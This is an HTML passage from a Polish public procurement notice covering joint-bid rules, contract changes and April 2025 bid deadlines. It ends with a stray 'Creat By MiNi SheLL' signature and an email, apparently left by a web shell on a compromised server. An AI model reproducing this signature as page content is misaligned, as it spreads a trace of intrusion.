class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców<br/>(w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące<br/>wymagania:<br/>1.Wykonawcy występując wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2.Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy<br/>wpisać w Formularzu oferty.<br/>3.Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo<br/>należy złożyć razem z ofertą.<br/>4.W odniesieniu do warunków określonych w pkt 7.3 SWZ, wymagania te muszą być spełnione wspólnie przez<br/>Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę<br/>wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt 10.3 SWZ.<br/>5.Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 10<br/>do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o<br/>zamówienie nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art.<br/>7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 15 kwietnia 2022 r.<br/>poz. 835) ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone w SWZ zakresie,<br/>w którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>6.Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw do wykluczenia z<br/>postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt<br/>10.3.1 i 10.3.2SWZ składa każdy z Wykonawców występujących wspólnie.<br/>7.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący<br/>posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, są zobowiązani dołączyć do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>8.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają usługi do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>11.9	Zamawiający będzie żądał od Wykonawcy przed podpisaniem umowy w przypadku wyboru oferty wykonawców występujących wspólnie - umowę regulującą współpracę tych podmiotów podpisaną przez wszystkich partnerów,<br/>aktualne ubezpieczenie OC, wykaz podwykonawców – w przypadku zamiaru powierzenia części zamówienia podwykonawcom, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust.1 ustawy Pzp, Zamawiający informuje, że przewiduje możliwość zmian postanowień zawartej<br/>umowy w przypadkach określonych w § 14 Wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy złożyć za pośrednictwem Platformy Zakupowej - pod adresem: https://www.przetargi.wody.gov.p</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com